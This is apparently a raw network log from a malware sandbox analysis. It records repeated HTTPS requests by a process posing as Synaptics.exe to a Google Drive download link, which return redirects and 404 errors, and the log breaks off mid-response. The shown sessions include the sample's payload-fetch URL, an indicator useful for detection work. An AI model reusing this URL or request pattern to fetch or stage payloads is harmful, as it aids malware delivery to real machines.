2024-12-30 10:40:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:44 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-qNMhi5mwmEKzt7Duws7jZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49833 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:44 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
2024-12-30 10:40:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:44 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-oA1qnrZ9dVBpoPk8__zSTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      24 | 192.168.2.6 | 49836 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:44 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:45 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5lDUluWjpr3icEoJTIspjwaL921ropBmxiIdkDPQyJQZ9eVefFMw8gZJWCnaZA4loNWgmrtLU
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:45 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zH9V_vV7xkUPDx2Cv6nqrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:45 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:45 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="OfPvGS9_nxdmAi8Nxky6lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:45 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      25 | 192.168.2.6 | 49835 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:44 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:45 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5va-gYexViE6-FtIzOZPQ2BNpD1s3RTWRfark6q3muu_XGaDNDpoLmoAn5x3HlxHIQISUXRiw
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:45 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Pm3g7F377XXyk0ZJsPa0Iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:45 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:45 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="DISTE6xdRGZdphVPQIF6gg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:45 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      26 | 192.168.2.6 | 49845 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:45 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      27 | 192.168.2.6 | 49846 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:45 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      28 | 192.168.2.6 | 49854 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:46 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:46 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-f4CRNDc4sK_UP4XX4Ujonw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      29 | 192.168.2.6 | 49855 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:46 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:46 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sC7rTsbcSCOj5n8SsHwKHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      30 | 192.168.2.6 | 49862 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:47 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:47 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-GYFitZDoMpFODr619R-FiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      31 | 192.168.2.6 | 49864 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:47 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:47 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-gCnMaZr4awSEM9PTFmYAqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      32 | 192.168.2.6 | 49861 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:47 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:47 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4ZJCzwavFvV_jXkamolU4IcoO7y94mslB5IkprvD56BsXczWtSZpis6lfxTOSooCBSP3DrYIU
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:47 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-yH-Ss2849tMJ2ye23x4UlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:47 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:47 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="p4F6wniNAbmJG-AoWai83g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:47 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      33 | 192.168.2.6 | 49863 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:47 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:47 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6ECm1TxO9_Y_R_zeUMUtx_dEWqKdl9Je9KGTkZKb23w7txD3jRMlS8buy3OaPFGUep
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:47 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_YhG6DZjERxiMrIanbQBxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:47 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:47 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="XrVx1wVP_Gno1a-Qbv1k0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:47 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      34 | 192.168.2.6 | 49870 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:48 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:48 GMT
